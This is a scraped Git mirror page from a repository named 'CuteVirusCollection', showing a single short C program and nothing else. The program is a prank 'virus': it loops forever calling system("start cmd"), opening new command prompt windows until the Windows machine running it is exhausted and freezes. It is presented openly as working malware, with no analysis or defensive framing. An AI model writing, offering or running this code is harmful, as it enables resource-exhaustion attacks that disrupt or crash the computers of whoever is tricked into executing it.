mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-22 15:16:27 -08:00
8 lines
80 B
C
8 lines
80 B
C
#include <stdlib.h>
|
|
|
|
main(){
|
|
while(1){
|
|
system("start cmd");
|
|
}
|
|
}
|